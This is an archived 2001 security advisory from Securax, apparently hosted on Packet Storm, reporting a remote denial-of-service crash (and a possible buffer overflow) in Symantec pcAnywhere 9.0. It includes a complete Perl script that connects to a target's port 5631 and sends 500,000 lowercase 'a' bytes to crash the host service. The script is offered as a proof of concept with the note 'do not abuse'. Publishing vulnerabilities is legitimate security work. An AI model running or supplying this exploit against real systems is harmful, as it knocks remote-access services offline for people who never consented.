exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

scx-sa-14.txt

scx-sa-14.txt
Posted Feb 14, 2001
Authored by Root-dude | Site securax.org

Securax Security Advisory #14 - Symantec pcAnywhere 9.0 contains a remote denial of service vulnerability. Includes perl exploit.

tags | exploit, remote, denial of service, perl
SHA-256 | f3aabfbdc4849e9d23de5fa5090f05eb0635dac8a1a39400e0f58a1b0dcc758a

scx-sa-14.txt

Change Mirror Download
=============================================================================
Securax-SA-14 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced: 2001-02-08
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



Note: This entire advisory has been based upon trial and error results. We
can not ensure the information below is 100% correct being that we do
not have any source code to audit. This document is subject to change
without prior notice.

If you happen to find more information / problems concerning the below
problem or further varients please contact me on the following email
incubus@securax.net, or you can contact info@securax.org.


I. Problem Description
-----------------------

Symantec PcAnywhere is a program that will allow others (who are authorised
to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal
server.

PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
(pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user
sends certain data in a particular way, pcAnywhere will crash.

When a large amount (it depends, sometimes the host will go down with 320k
characters, sometimes, you will have to send 500k bytes of data) are sent to
a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and
give an error on the screen, and write the "Unexpected program error" to a
logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)

Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

Why no exploit, just a lame Denial of Service?

1.) because I suck in win32 debugging / overflowing (but i'm reading)
/* so if I can overflow win32 progs, i'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..

The DoS code:

<--bof-->

#!/usr/bin/perl

# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus@securax.net>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!

use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();

<--eof-->


II. Impact
----------

If someone exploits this, than Symantec is forced to rename the name of this
product to PcAnyoneAnywhere or something...

No, seriously, this could lead to a compromise of a system.


III. possible workarounds
-------------------------

This advisory was also sent to Symantec (info@symantec.com), we'll see what
they do with it...

IV credits
----------
love to Tessa.
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
and so many, many others I forgot...


=============================================================================
For more information incubus@securax.org
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
-----------------------------------------------------------------------------

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close